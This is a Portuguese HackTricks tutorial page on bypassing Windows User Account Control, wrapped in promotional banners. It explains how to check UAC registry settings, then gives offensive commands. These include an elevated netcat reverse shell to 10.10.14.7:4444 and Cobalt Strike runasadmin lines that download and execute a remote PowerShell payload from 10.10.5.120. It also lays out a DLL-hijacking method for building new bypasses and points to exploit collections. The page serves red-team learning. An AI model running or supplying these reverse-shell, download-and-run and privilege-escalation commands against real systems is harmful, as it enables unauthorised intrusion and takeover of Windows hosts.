21 KiB
UAC - Controle de Conta de Usuário
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Participe do grupo 💬 Discord ou do grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud no github.
Use Trickest para construir e automatizar fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Obtenha Acesso Hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
UAC
Controle de Conta de Usuário (UAC) é um recurso que permite um prompt de consentimento para atividades elevadas. Aplicações têm diferentes níveis de integridade
, e um programa com um nível alto pode realizar tarefas que podem comprometer o sistema. Quando o UAC está ativado, aplicações e tarefas sempre executam sob o contexto de segurança de uma conta de não-administrador a menos que um administrador autorize explicitamente essas aplicações/tarefas a terem acesso de nível de administrador ao sistema para executar. É um recurso de conveniência que protege os administradores de mudanças não intencionais, mas não é considerado um limite de segurança.
Para mais informações sobre níveis de integridade:
{% content-ref url="../windows-local-privilege-escalation/integrity-levels.md" %} integrity-levels.md {% endcontent-ref %}
Quando o UAC está em vigor, um usuário administrador recebe 2 tokens: uma chave de usuário padrão, para realizar ações regulares como nível regular, e uma com os privilégios de admin.
Esta página discute como o UAC funciona em grande profundidade e inclui o processo de logon, experiência do usuário e arquitetura do UAC. Administradores podem usar políticas de segurança para configurar como o UAC funciona especificamente para sua organização no nível local (usando secpol.msc), ou configurado e distribuído via Objetos de Política de Grupo (GPO) em um ambiente de domínio do Active Directory. As várias configurações são discutidas em detalhe aqui. Existem 10 configurações de Política de Grupo que podem ser definidas para o UAC. A tabela a seguir fornece detalhes adicionais:
Teoria de Bypass do UAC
Alguns programas são automaticamente autoelevados se o usuário pertencer ao grupo de administradores. Esses binários têm dentro de seus Manifestos a opção autoElevate com valor True. O binário também tem que ser assinado pela Microsoft.
Então, para bypassar o UAC (elevar de nível de integridade médio para alto), alguns atacantes usam esse tipo de binários para executar código arbitrário porque ele será executado a partir de um processo de integridade de nível Alto.
Você pode verificar o Manifesto de um binário usando a ferramenta sigcheck.exe da Sysinternals. E você pode ver o nível de integridade dos processos usando Process Explorer ou Process Monitor (da Sysinternals).
Verificar UAC
Para confirmar se o UAC está ativado, faça:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
Se for 1
, então o UAC está ativado, se for 0
ou não existir, então o UAC está inativo.
Em seguida, verifique qual nível está configurado:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
- Se
0
, então, o UAC não irá solicitar (como se estivesse desativado) - Se
1
, o administrador é solicitado a inserir nome de usuário e senha para executar o binário com altos privilégios (no Secure Desktop) - Se
2
(Sempre notificar-me) o UAC sempre pedirá confirmação ao administrador quando ele tentar executar algo com altos privilégios (no Secure Desktop) - Se
3
, como1
mas não é necessário no Secure Desktop - Se
4
, como2
mas não é necessário no Secure Desktop - Se
5
(padrão), será solicitado ao administrador para confirmar a execução de binários não Windows com altos privilégios
Então, você deve verificar o valor de LocalAccountTokenFilterPolicy
Se o valor for 0
, então, apenas o usuário RID 500 (Administrador integrado) poderá realizar tarefas de administração sem o UAC, e se for 1
, todas as contas dentro do grupo "Administradores" podem fazê-las.
E, finalmente, dê uma olhada no valor da chave FilterAdministratorToken
Se 0
(padrão), a conta de Administrador integrada pode realizar tarefas de administração remota e se 1
a conta de Administrador integrada não pode realizar tarefas de administração remota, a menos que LocalAccountTokenFilterPolicy
esteja configurado para 1
.
Resumo
- Se
EnableLUA=0
ou não existir, nenhum UAC para ninguém - Se
EnableLua=1
eLocalAccountTokenFilterPolicy=1
, Sem UAC para ninguém - Se
EnableLua=1
eLocalAccountTokenFilterPolicy=0
eFilterAdministratorToken=0
, Sem UAC para RID 500 (Administrador Integrado) - Se
EnableLua=1
eLocalAccountTokenFilterPolicy=0
eFilterAdministratorToken=1
, UAC para todos
Todas essas informações podem ser coletadas usando o módulo do metasploit: post/windows/gather/win_privs
Você também pode verificar os grupos do seu usuário e obter o nível de integridade:
net user %username%
whoami /groups | findstr Level
UAC bypass
{% hint style="info" %} Observe que se você tem acesso gráfico à vítima, o bypass do UAC é direto, pois você pode simplesmente clicar em "Sim" quando o prompt do UAS aparecer. {% endhint %}
O bypass do UAC é necessário na seguinte situação: o UAC está ativado, seu processo está rodando em um contexto de integridade média e seu usuário pertence ao grupo de administradores.
É importante mencionar que é muito mais difícil burlar o UAC se ele estiver no nível de segurança mais alto (Sempre) do que se estiver em qualquer um dos outros níveis (Padrão).
UAC desativado
Se o UAC já estiver desativado (ConsentPromptBehaviorAdmin
é 0
), você pode executar um shell reverso com privilégios de admin (nível de integridade alto) usando algo como:
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
UAC bypass com duplicação de token
- https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
- https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html
"Bypass" muito básico do UAC (acesso total ao sistema de arquivos)
Se você tem um shell com um usuário que está dentro do grupo Administradores, você pode montar o C$ compartilhado via SMB (sistema de arquivos) localmente em um novo disco e você terá acesso a tudo dentro do sistema de arquivos (inclusive a pasta do Administrador).
{% hint style="warning" %} Parece que este truque não funciona mais {% endhint %}
net use Z: \\127.0.0.1\c$
cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
Bypass do UAC com cobalt strike
As técnicas do Cobalt Strike só funcionarão se o UAC não estiver configurado no seu nível máximo de segurança
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]
# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
Empire e Metasploit também possuem vários módulos para bypass do UAC.
KRBUACBypass
Documentação e ferramenta em https://github.com/wh0amitz/KRBUACBypass
Exploits de bypass do UAC
UACME que é uma compilação de vários exploits de bypass do UAC. Note que você precisará compilar o UACME usando o visual studio ou msbuild. A compilação criará vários executáveis (como Source\Akagi\outout\x64\Debug\Akagi.exe
), você precisará saber qual deles você precisa.
Você deve ter cuidado porque alguns bypasses irão acionar outros programas que irão alertar o usuário de que algo está acontecendo.
O UACME possui a versão de build a partir da qual cada técnica começou a funcionar. Você pode procurar por uma técnica que afete suas versões:
PS C:\> [environment]::OSVersion.Version
Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
Também, usando esta página você obtém o lançamento do Windows 1607
a partir das versões de build.
Mais métodos de bypass do UAC
Todas as técnicas usadas aqui para contornar o UAC exigem uma shell interativa completa com a vítima (uma shell comum nc.exe não é suficiente).
Você pode conseguir isso usando uma sessão meterpreter. Migre para um processo que tenha o valor Session igual a 1:
(explorer.exe deve funcionar)
Bypass do UAC com GUI
Se você tem acesso a uma GUI, você pode simplesmente aceitar o prompt do UAC quando ele aparecer, você realmente não precisa contorná-lo. Portanto, ter acesso a uma GUI permitirá que você contorne o UAC.
Além disso, se você obtiver uma sessão GUI que alguém estava usando (potencialmente via RDP), existem algumas ferramentas que estarão rodando como administrador de onde você poderia executar um cmd por exemplo como admin diretamente sem ser solicitado novamente pelo UAC como https://github.com/oski02/UAC-GUI-Bypass-appverif. Isso pode ser um pouco mais discreto.
Bypass do UAC com força bruta barulhenta
Se você não se importa em ser barulhento, você sempre pode executar algo como https://github.com/Chainski/ForceAdmin que pede para elevar permissões até que o usuário aceite.
Seu próprio bypass - Metodologia básica de bypass do UAC
Se você olhar para o UACME, notará que a maioria dos bypasses do UAC abusa de uma vulnerabilidade de Hijacking de Dll (principalmente escrevendo a dll maliciosa em C:\Windows\System32). Leia isto para aprender como encontrar uma vulnerabilidade de Hijacking de Dll.
- Encontre um binário que irá autoelevate (verifique que quando ele é executado, ele roda em um nível de integridade alto).
- Com o procmon, encontre eventos "NAME NOT FOUND" que possam ser vulneráveis a Hijacking de DLL.
- Provavelmente você precisará escrever a DLL dentro de alguns caminhos protegidos (como C:\Windows\System32) onde você não tem permissões de escrita. Você pode contornar isso usando:
- wusa.exe: Windows 7,8 e 8.1. Permite extrair o conteúdo de um arquivo CAB dentro de caminhos protegidos (porque esta ferramenta é executada a partir de um nível de integridade alto).
- IFileOperation: Windows 10.
- Prepare um script para copiar sua DLL para dentro do caminho protegido e executar o binário vulnerável e autoelevado.
Outra técnica de bypass do UAC
Consiste em observar se um binário autoElevated tenta ler do registro o nome/caminho de um binário ou comando a ser executado (isso é mais interessante se o binário procurar essa informação dentro do HKCU).
Use Trickest para construir e automatizar fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Obtenha Acesso Hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras maneiras de apoiar o HackTricks:
- Se você quiser ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o merchandising oficial do PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas dicas de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud no github.